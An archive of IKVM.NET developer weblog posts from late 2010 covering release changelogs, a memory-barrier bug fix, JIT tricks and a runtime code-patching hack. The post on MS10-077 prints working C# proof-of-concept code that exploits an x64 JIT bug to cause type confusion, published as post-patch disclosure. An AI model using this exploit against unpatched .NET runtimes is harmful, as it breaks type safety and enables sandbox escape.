# Sunday, 21 November 2010
How to Detect if a Method is Overridden

Suppose you want to know if (the class of) a particular object overrides a virtual method. For an example of this see OpenJDK's Thread.isCCLOverriden() (line 1573).

In Java the obvious way to do this would be to use reflection. On the CLR there is another way that is both more accurate1 and more efficient.

Here's the MSIL method from IKVM's java.lang.Thread.isCCLOverridden() implementation:

.method private hidebysig static bool isCCLOverridden(class java.lang.Thread A_0) cil managed
{
  ldftn      instance class java.lang.ClassLoader java.lang.Thread::getContextClassLoader()
  ldarg.0
  ldvirtftn  instance class java.lang.ClassLoader java.lang.Thread::getContextClassLoader()
  ceq
  ldftn      instance void java.lang.Thread::setContextClassLoader(class java.lang.ClassLoader)
  ldarg.0
  ldvirtftn  instance void java.lang.Thread::setContextClassLoader(class java.lang.ClassLoader)
  ceq
  and
  ldc.i4.0
  ceq
  ret
}

Instead of running a zillion instructions and accessing a lot of cold data for reflection, this simply leverages the information the JIT already has about virtual methods.

Here's the x86 code this turns into:

  push        ebp 
  mov         ebp,esp 
  push        esi 
  push        ebx 
  mov         esi,ecx 
  push        258F58h 
  mov         ecx,esi 
  mov         edx,259240h 
  call        JIT_VirtualFunctionPointer
  mov         edx,25DCA0h 
  cmp         eax,edx 
  sete        bl 
  movzx       ebx,bl 
  push        2591A0h 
  mov         ecx,esi 
  mov         edx,259240h 
  call        JIT_VirtualFunctionPointer
  mov         edx,25DCB0h 
  cmp         eax,edx 
  sete        al 
  movzx       eax,al 
  and         ebx,eax 
  sete        al 
  movzx       eax,al 
  pop         ebx 
  pop         esi 
  pop         ebp 
  ret

To get an idea what JIT_VirtualFunctionPointer does, take a look at the Shared Source CLI.

On the CLR, in the common case it only executes about 40 instructions.

The downside to this method is that it only works if you have an object instance. Although you could use FormatterServices.GetUninitializedObject() to create an instance.

Why Optimize This?

In the OpenJDK code, isCCLOverridden() is only called if a SecurityManager is installed, but I wanted to use it always to avoid calling getContextClassLoader() during thread construction, because that would trigger the system class loader to be constructed and I my long term goal for IKVM is to make initialization more lazy to reduce the huge startup overhead.


1This method is more accurate (on the CLR) because you don't need to worry about non-virtual methods or virtual methods that are new (and hence don't override the base class virtual method) or explicit overrides that override a method but have a different name.

Update: See this article for a caveat.

Sunday, 21 November 2010 11:36:21 (W. Europe Standard Time, UTC+01:00)  #    Comments [2]
# Wednesday, 17 November 2010
New Development Snapshot

Time for a new snapshot.

Changes:

  • Added support for using MethodImplAttribute as a Java annotation.
  • Fixed class name resolution for xml remapping instructions.
  • Many AWT fixes.
  • Fixed xml remapper to interpret empty sig attribute on call as zero length argument list.
  • Added memory barrier after volatile stores.
  • Added optimization to remove redundant memory barriers.
  • Changed default assembly class loader instantiation to avoid security manager check.
  • Fixed ikvm.exe -D property name parsing to accept properties with equals sign in the name.
  • Fixed JdbcOdbc provider to use Invariant Culture for Decimal/BigDecimal conversion.
  • Fixed column type mapping bugs in JdbcOdbcResultSetMetaData.
  • Fixed resource (and virtual class file) loading regression that caused loading resources from assemblies with an underscore in the name to fail.

Binaries available here: ikvmbin-0.45.3973.zip

Wednesday, 17 November 2010 09:08:33 (W. Europe Standard Time, UTC+01:00)  #    Comments [2]
# Thursday, 11 November 2010
IKVM.NET 0.36 Update 3

On request of an IKVM.NET user still stuck on .NET 1.1 the memory model fix has been backported to 0.36.

Changes:

  • Changed version to 0.36.0.14.
  • Emit a memory barrier after volatile stores.

Binaries available here: ikvmbin-0.36.0.14.zip
Sources (+ binaries): ikvm-0.36.0.14.zip

Thursday, 11 November 2010 07:09:06 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]
# Monday, 01 November 2010
C# Async CTP

Last week at the PDC Microsoft released a CTP of the upcoming C# (and VB.NET) async feature. When you install the Async CTP and run the code below with the current IKVM.NET release you'll see something like this:

7
Downloaded 64803 bytes
13

This means that after the async operation completed the method resumed on another thread. However, if you get the current IKVM.NET code from cvs, you'll see:

7
Downloaded 64803 bytes
7

Via the magic of SynchronizationContext the method now resumes on the AWT event thread, if the await happened on that thread.

Here's the demo:

using System;
using System.Threading;
using System.Net;
using java.awt;
using java.awt.@event;

class AsyncDemo : Frame, ActionListener
{
  AsyncDemo()
  {
    var button = new Button("Click Me");
    button.addActionListener(this);
    add(button);
    pack();
    setVisible(true);
  }

  public async void actionPerformed(ActionEvent ae)
  {
    Console.WriteLine(Thread.CurrentThread.ManagedThreadId);
    var wc = new WebClient();
    var data = await wc.DownloadDataTaskAsync("http://weblog.ikvm.net/");
    Console.WriteLine("Downloaded {0} bytes", data.Length);
    Console.WriteLine(Thread.CurrentThread.ManagedThreadId);
  }

  static void Main()
  {
    new AsyncDemo();
  }
}

Monday, 01 November 2010 15:57:38 (W. Europe Standard Time, UTC+01:00)  #    Comments [2]
# Tuesday, 26 October 2010
How to Hack Your Own JIT Intrinsic

Yesterday I wrote about Thread.MemoryBarrier() and some of its performance characteristics. I wanted to do some benchmarking to see whether mfence really is faster than a locked memory operation, but instead of writing a microbenchmark (which I had already done) I wanted to run code that was a little bit more "real". So I came with a hack to allow mfence to be used in managed code. Please note that this is a hack and not something you should use outside of an experimental context. The code is available here.

The code includes a microbenchmark, but not the "real" benchmark (based on LinkedBlockingQueue) that I used.

I also tested a Pentium 4 class machine and a Core i7. On the Pentium 4 and my Core 2 Duo the mfence wins out signicantly, but on the Core i7 mfence is significantly slower, oddly enough.

How the Hack Works

The MemoryBarrierHack.cs file contains two classes, __Hack__DoNotUse and Program. The __Hack__DoNotUse class contains the MemoryBarrier method and a static constructor to patch the MemoryBarrier method. The MemoryBarrier method is patched to patch the call site of its caller and replace the call with an mfence and a mov al,imm8 as a filler. This means that when you want a memory barrier, you simply call the static method and when that call executes, the first time it will act as a memory barrier (because of the locked memory operation) and also patch the call so that the next time it will be an mfence instruction.

I built a modified IKVM runtime that uses this trick and used that to benchmark the LinkedBlockingQueue. On my system it showed a performance improvement of about 7% with mfence versus .NET 4.0's MemoryBarrier instrinsic.

Tuesday, 26 October 2010 11:50:03 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
# Monday, 25 October 2010
Memory Model Fix

In last week's 0.44.0.6 update I fixed a memory model bug. In retrospect it was a pretty dumb bug, but in my defence, even the easy parts of memory models are still pretty subtle and when I started IKVM.NET both the Java and CLR memory models were not very well documented.

First of all, I should thank Staffan Ulfberg for filing an exceptionally high quality bug report.

Finding the Problem

After spending some quality time in Windbg looking at the crash dump and with the java.util.concurrent sources, I was eventually able to reproduce the problem on a single CPU quad core Xeon (but not on my Core 2 laptop). After it was reproducable I started pruning the repro to find the troublespot and eventually found this method:

java.util.concurrent.AbstractQueuedSynchronizer.java
public final boolean release(int arg) {
  if (tryRelease(arg)) {
    Node h = head;
    if (h != null && h.waitStatus != 0)
      unparkSuccessor(h);
    return true;
  }
  return false;
}

My pruned version looked like this:

public final void release() {
  state = 0;
  Node h = head;
  if (h != null && h.waitStatus != 0)
    unparkSuccessor(h);
}

Both state and head are volatile fields. With this modified version the hang usually happened with in a second and I had also added a timeout to park so the problem could be seen repeatedly without restarting the process. After seeing this and thinking about it for a bit, I realized that if the read of head could be reordered with the write of state, that could cause the observed hang. To test that theory, I used Windbg to patch the running code to add an sfence instruction after the state = 0 store. That did indeed make the problem go away and replacing the sfence with three nop instructions made it reappear.

Time to read up on the memory models.

Java Memory Model

For the Java memory model, the JSR 133 Cookbook is a good place to start. It has a nice table that confirms that the reordering isn't allowed in Java:

Can Reorder 2nd operation
1st operation Normal Load
Normal Store
Volatile Load
MonitorEnter
Volatile Store
MonitorExit
Normal Load
Normal Store


No
Volatile Load
MonitorEnter
No No No
Volatile store
MonitorExit

No No

The yellow box clearly says No :-)

CLR Memory Model

The CLR memory model is summarized nicely in this blog post by Joe Duffy and he explicitly calls out: "With this model, the only true case where you’d truly need the strength of a full-barrier provided by Rule 4 is to prevent reordering in the case where a store is followed by a volatile load. Without the barrier, the instructions may reorder."

So that confirmed that I did indeed need to emit a memory barrier between a volatile store and a subsequent load. I modified the bytecode compiler to emit a call to Thread.MemoryBarrier() after every volatile store.

CLI Memory Model

I explicitly chose not to support the CLI memory model, because it is not very well specified and is impossible to test against. I don't know what memory model Mono implements, but I did find that Thread.MemoryBarrier() was not implemented for x86.

Thread.MemoryBarrier() Implementation Issues

I picked Thread.MemoryBarrier() for 0.44 because it was the easiest and lowest risk fix. An alternative would be to use Interlocked.Exchange() to write to a volatile field. On .NET 2.0, Thread.MemoryBarrier() is implemented as a native method that does more work than just the memory barrier, it also polls for GC and acts as a safe point. On .NET 4.0 it has been turned into a JIT intrinsic and the overhead is lower. Unfortunately, on my system, the .NET 4.0 memory barrier is still significantly slower than the HotSpot memory barrier (which uses mfence), but apparently the trade-off between mfence and a locked instruction is not trivial.

Optimization

In the 0.45 code (where there is now an MSIL optimization step), I added an optimization to remove redundant memory barriers. If multiple volatile stores are done in succession, only the last one will get a memory barrier.

Testing

Finally, here's a small test that reproduces the problem (on my Core 2 laptop):

class Rendezvous extends java.util.concurrent.atomic.AtomicInteger {
  private static final int PARTIES = 2;

  public final void await() {
    if (incrementAndGet() == PARTIES) {
      compareAndSet(PARTIES, 0);
      return;
    }
    while (get() != 0) ;
  }
}

public class test {
  static volatile int p1;
  static volatile int p2;
  static volatile int r1;
  static volatile int r2;
  static final Rendezvous rv1 = new Rendezvous();
  static final Rendezvous rv2 = new Rendezvous();

  public static void main(String[] args) {
    Thread t = new Thread() {
      public void run() {
        for (; ; ) {
          p1 = 0;
          rv1.await();

          p1 = 1;
          r1 = p2;

          rv2.await();
        }
      }
    };
    t.start();

    for (int i = 0; i < 1000000; i++) {
      p2 = 0;
      rv1.await();

      p2 = 1;
      r2 = p1;

      rv2.await();

      if (r1 == 0 && r2 == 0)
        System.out.println("Oops! i = " + i);
    }

    t.stop();
  }
}

Monday, 25 October 2010 08:58:57 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]
# Friday, 22 October 2010
MS10-077 Vulnerability Details

Last week Microsoft released MS10-077. Here are the details.

Coincidentally I found this vulnerability in the .NET 4.0 RC on the day that .NET 4.0 went RTM (April 12, 2010) and the next day confirmed that RTM was also affected and reported it to MSRC.

It's not really a very interesting vulnerability, just a bug in an optimization that the x64 JIT does. Here's the code to exploit it:

using System;
using System.Runtime.CompilerServices;
class Union1
{
  internal volatile int i;
  internal volatile int j;
}
class Union2
{
  internal volatile object o;
  internal volatile int[] arr;
}
class Program
{
  static Union1 union1 = new Union1();
  static Union2 union2;
  class Base
  {
    public virtual Base Get()
    {
      return null;
    }
  }
  class Derived : Base
  {
    public Union2 i;
  }
  class MyDerived : Derived
  {
    public override Base Get()
    {
      return new MyBase();
    }
  }
  class MyBase : Base
  {
    object foo = union1;
  }
  [MethodImpl(MethodImplOptions.NoInlining)]
  static void x64_JIT_Bug(Derived d)
  {
    Base b = d;
  loop:
    if (b != null)
    {
      if (b is Derived)
      {
        Oops((Derived)b);
      }
      b = b.Get();
      goto loop;
    }
  }
  static void Oops(Derived d)
  {
    union2 = d.i;
  }
  static void Main()
  {
    x64_JIT_Bug(new MyDerived());
    Console.WriteLine(union1);
    Console.WriteLine(union2);
  }
}

The bug is in x64_JIT_Bug. The "b is Derived" test and "(Derived)" cast are incorrectly optimized away.

Friday, 22 October 2010 14:02:12 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
IKVM.NET 0.44 Update 1 RC 0

Time for a refresh of 0.44 with some bug fixes.

Changes:

  • Changed version to 0.44.0.6
  • Backported various build system improvements.
  • Backported IKVM.Reflection ILGenerator exception table sorting bug fix (when running on Mono).
  • Backported Mono 2.8 mcs build workarounds.
  • Backported support for boolean, byte, char and short non-final static field constant attributes.
  • Backported core assembly detection fix.
  • Backported fix to make sure that ikvmc (and ikvmstub) can find assemblies that are part of a multi assembly (shared class loader) group (if the assembly is in the same directory as the main assembly of the group).
  • Backported fix for regression in stack trace printing of .NET (not remapped) exceptions introduced in 0.44. The .NET stack trace should not be included in the message.
  • Backported fix for ikvmc sometimes incorrectly handling InternalsVisibleToAttributes in multi assembly builds.
  • Backported fix for regression introduced with fault handlers. Exception handlers inside fault handlers could be ignored.
  • Backported fix for #3086040. Volatile stores require a memory barrier.

Binary available here: ikvmbin-0.44.0.6.zip

Sources: ikvmsrc-0.44.0.6.zip, openjdk6-b18-stripped.zip

Friday, 22 October 2010 10:25:42 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
# Friday, 15 October 2010
New Development Snapshot

Time for a new snapshot. No major theme this time, but lots of bug fixes and some new infrastructure for doing more MSIL optimizations. Volker added the Nimbus L&F.

Changes:

  • Moved local variable analysis from verifier into a separate pass.
  • Restructured method analyzer/verifier to make data flow more obvious and keep less data alive during compilation.
  • Various minor refactorings and clean up.
  • Changed workaround for gmcs inability to properly deal with two-pass compilation of mutually dependant assemblies to use reflection, because the previous workaround now also fails on Mono 2.8.
  • Fixed reflection method invocation issue: Always wrap InvocationTargetException in another InvocationTargetException, to handle the case where a method is recursively calling itself.
  • Added support for boolean, byte, char and short non-final static field constant attributes.
  • Implemented create() for ButtonPeer and LabelPeer.
  • Implemented first stab at converting suitable fault blocks into finally blocks.
  • Changed CodeEmitter to build intermediate store of MSIL code to allow post-processing optimization steps.
  • Added endfinally opcode support to xml remapper.
  • Changed xml remapper to require explicit exits in exception blocks.
  • Moved ikvmc core assembly detection to the right place, to avoid problems when a non-main assembly of the core assembly set is explicitly referenced.
  • Fix to make sure that ikvmc (and ikvmstub) can find assemblies that are part of a multi assembly (shared class loader) group (if the assembly is in the same directory as the main assembly of the group).
  • Fix a rounding problem with FontMetrics.
  • Implemented createCompatibleVolatileImage() for Nimbus.
  • Implemented Graphics.setPaint() with a LinearGradientPaint for Nimbus.
  • Added Nimbus L&F.
  • Fixed threading problem in font metrics code.
  • Fixed regression in stack trace printing of .NET (not remapped) exceptions introduced in 0.44. The .NET stack trace should not be included in the message.
  • Fixed ikvmc bug. Before saving any of the output assemblies, we should first finish all of them (because InternalsVisibleToAttributes may be added as a side effect of compiling code in another assembly).
  • Fixed regression in SocketInputStream.read(). The offset into the byte array was ignored.
  • Use renderings hints of FontMetrics for drawGlyphVector.
  • Fixed regression introduced with fault handlers. Exception handlers inside fault handlers could be ignored.
  • Added some experimental MSIL optimizations to CodeEmitter. They can be enabled by setting the IKVM_EXPERIMENTAL_OPTIMIZATIONS environment variable.
  • Added error handling for -remap file errors to ikvmc.
  • IKVM.Reflection: Fixed ILGenerator to throw a NotSupportException if a branch offset doesn't fit (i.e. when a short form branch is used inappropriately).
  • IKVM.Reflection: Added exception message for backward branch constraints violations.
  • IKVM.Reflection: Fixed ILGenerator to properly sort exception table when running on Mono.

Binaries available here: ikvmbin-0.45.3940.zip

Friday, 15 October 2010 06:32:16 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Friday, 10 September 2010
New Development Snapshot

I've started on IPv6 support. The classic socket APIs (i.e. the java.net package) now supports IPv6. At the moment it is .NET only, because Mono on Windows doesn't appear to support IPv6 and on Linux you apparently cannot bind both an IPv4 and IPv6 socket to the same port at the same time (suggestions on this are welcome).

The implementation is based on a relatively straightforward port of the OpenJDK files TwoStacksPlainDatagramSocketImpl.c and TwoStacksPlainSocketImpl.c to Java. I wrote a Java Winsock API wrapper on top of the .NET Socket API (which in turn is a wrapper on the actual Winsock API). In the future the OpenJDK DualStack code should also be ported, for use on Vista/Win7 and probably Linux.

What remains to be done is update the nio socket code to support IPv6.

Changes:

  • Added some missing resources to IKVM.OpenJDK.Tools.dll.
  • Removed x64 JIT bug workaround that triggered another x64 bug.
  • Implemented IPv6 support (.NET only) for java.net package APIs.
  • Several fixes/improvements to java.net.NetworkInterface.
  • Implemented Graphics.drawImage() with AffineTransform.
  • Improved StandardGlyphVector.
  • FontMetrics fixes.
  • Inet[4|6]AddressImpl.lookupAllHostAddr() should throw UnknownHostException instead of returning an empty array.
  • Don't expose IPv6 network interface addresses when IPv6 isn't enabled.
  • Added workaround for Mono TimeZoneInfo bug.
  • Fix build on Linux.
  • Fixed java.lang.Thread to synchronize on private lock instead of Thread object in thread startup code, to avoid potential deadlock with user code.
  • Added check to make sure that vfs.zip exists, before building second pass version of IKVM.Runtime.dll, because it appears that mcs doesn't complain about missing resources.
  • Fixed bug #3056721.
  • Added explanatory message to Link Error if it is caused by a missing reference.

Binaries available here: ikvmbin-0.45.3905.zip

Friday, 10 September 2010 11:44:21 (W. Europe Daylight Time, UTC+02:00)  #    Comments [4]